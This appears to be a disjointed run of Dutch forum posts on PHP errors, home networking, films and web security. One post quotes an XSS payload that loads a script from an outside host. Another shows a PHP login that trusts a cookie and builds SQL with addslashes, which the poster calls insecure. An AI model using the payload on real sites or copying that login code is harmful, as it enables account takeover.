Bel gewoon je wenhoster op FFS

http://www.crimemind.nl/tpb/CaptchaSec…100&character=6
Je krijgt een error. Haal de
header('Content-Type: image/jpeg');
weg en je ziet de PHP error.

Waarom!!!!!!!!!!!!!!
Zo zie je zelf ook hoe irritant dat is.

Ik heb hem al Stuur hem via wave wel om de pret niet te bederven

id 	name 	num_edits
1 	Stefan 	3
2 	Henk 	0
3 	Jan 	0
4 	Connie 	0
5 	Els 	0
6 	Anne 	3
7 	Niels 	1
8 	Barrie 	0
9 	Ronnie 	0

Citaat van Melvin

heb je wel eens gekeken of je niet perongeluk de 2computers het zelfde intern ip adres heb toegekend?

ps: wrm werk je niet gewoon met een werkgroep als je met zo'n weinig computers werkt is dat vele malen sneller en het scheelt je een hoop werk met de configuratie

Misschien is het handig als je op beide pc's kunt inloggen en je eigen documenten hebt?

Voor wat ik zo weet lag het bij mij aan de dns, toen ik die opniuew geinstalleerd had werkte hij prima. Maar ik twijfel trouwens of je de software wel legaal hebt aangezien Windows server 2003 toch wel redelijk prijzig is.

interneppers
Ik weet niet uit welk hol jij bent gekropen maar kijk dit eens:

Citaat

... html tags kunnen opzich welzonder quotes dus.

Dit komt dus uit me vorige reactie.

Maargoed een screenshot doet me ook verdomd weinig eigenlijk, het kan net zo goed realtime geedit zijn aangezien je de web developers add on ook hebt.

Tevens ben je wel heel triest om te denken dat dit werkt:

"><script src=http://hackclub.nl/xss.js></script>

http://forums.techarena.in/active-directory/608458.htm
Had je hier al naar gekeken :)?

Heb zelf ook een keer zoiets gehad op school lag ook aan de DNS.

Citaat van Patrick

fock dat met je eggdrops klote tcl
MSL FTW

of php daar heb ik een bot mee draaien

En dat terwijl PHP geen connectie levend kan houden. Gebruik Perl ofzo.

http://www.criminalspoint.com/forum/topic/3367.html

right...

Dit was laatst al een keer besproken. Nog niet eens een maand terug dus zoeken is er ook niet bij blijkbaar.

<?php


Function islogged()
{
    if(isset($_COOKIE['id']) && ctype_digit($_COOKIE['id']) && isset($_COOKIE['gebruikersnaam']) && ctype_xdigit($_COOKIE['gebruikersnaam']))
    {


        $mysqli->query("SELECT gebruikersnaam FROM leden WHERE gebruikersnam='".addslashes($_COOKIE['gebruikersnaam']));


    if($mysqli->num_rows == 1)
    {
        //ingelogd


        return TRUE;
        
    }
    else
    {
        uitgelogd
    }
?>

Is alleen wel zo onveilig als wat aangezien je door middel van de cookie 'gebruikersnaam' te wijzigen toegang krijgt tot een ander account. Kijk eens naar sessies Stukje veiliger op de manier zoals jij het wil doen.

isset() kan trouwens meerdere waarden bevatten zegmaar dit:

isset($foo,$bar)

ICT zuigt toch als opleiding op zich. Mits je er verstand van hebt leer je er echt donders weinig. Enige wat ik heb geleerd is een beetje het dieper ingaan op netwerken.

Misschien een domme vraag maar wat maakt jou een 'designer', wat maakt jou creatief genoeg om een designer te worden? Tis een gewone vraag dus verwacht een normaal antwoord.

Citaat van Designer1994

Thebroders dat gaat over 3 broers
Die zien dat hun moeder in een winkel vermoord word
en dan gaan ze wraak nemen op die daders en ze vermoorden iedereen

Dit is pas een vet flim

Het is brothers dan alsnog. De film die jij beschrijft is Four Brothers.
http://www.imdb.com/title/tt0430105/

Citaat van wolf

imagina that van eddy murphie

ice age 3 ?

of dokter dottile

Het is Imagine That maar goed:
http://www.imdb.com/title/tt0780567/

Tis op zich wel een geinige film. Sowieso als er iemand van 11 bij is Vond hem zelf ook wel redelijk goed.

Citaat van interneppers

Een aangezien het hier gaat over Beveiligingslekken, zal ik hier ook gelijk reageren.

Was het jullie al bekend dat deze website ook lek is? XSS is mogelijk hier en daar (drie dubbele addslashes maakt niets uit 8-|).

Beheerder kan een mailtje sturen naar info @ naam die ik heb opgegeven en daarachter .nl

Bijzonder uhm.. triest. Sowieso heeft xss niks weinig te maken met slashes he. Alleen als je gebruik wilt maken van javascript, html tags kunnen opzich welzonder quotes dus.

Hmm zo had ik het nog niet gezien Stefan :p

Citaat van glammiiee

Crimepatrol & Niels
Lacherig vind ik het zelf niet echt hoor heb er veel spijt van dat ik het gedaan heb:)
maar als jullie het niet willen geloven ok is jullie probleem;)
ik wil ten eerste nooit meer in aanraking komen met politie najah niet op de slechte manier

Waarom praat je er zo makkelijk over dan (tussen alle spelfouten door). Als jij iemand het ziekenhuis in slaat dan lijkt het me niet dat je het klakkeloos op het Internet gaat zeggen. Het Internet is misschien wel anoniem maar jouw naam is via je profiel al zo terug te vinden dus dat werkt ook weer met terugwerkende kracht van je anonimiteit.

De random hash per user is zo gek nog niet hoor. PHPBB maakt er ook gebruik van bijvoorbeeld.

Je moet alleen eerst een query uitvoeren naar de desbetreffende gebruiker en dan de salt key opvragen. Wat je nu zal denken waarschijnlijk is dat je nu het wachtwoord gaat encrypten met de salt key en dan een nieuwe query uitvoert om te zien of het beide klopt (user en password).

Maar je kan ook gewoon het wachtwoord (wat al gehashed is) naast de salt key opvragen en dan gewoon een controle uitvoeren scheelt toch weer 1 query :p

glammiiee
Als je het werkelijk hebt gedaan doe je er wel heel lacherig over wat ik me niet kan voorstellen.

Zoek eens naar mysql injecties Vind je wel meer informatie over hetgeen wat jij wil weten.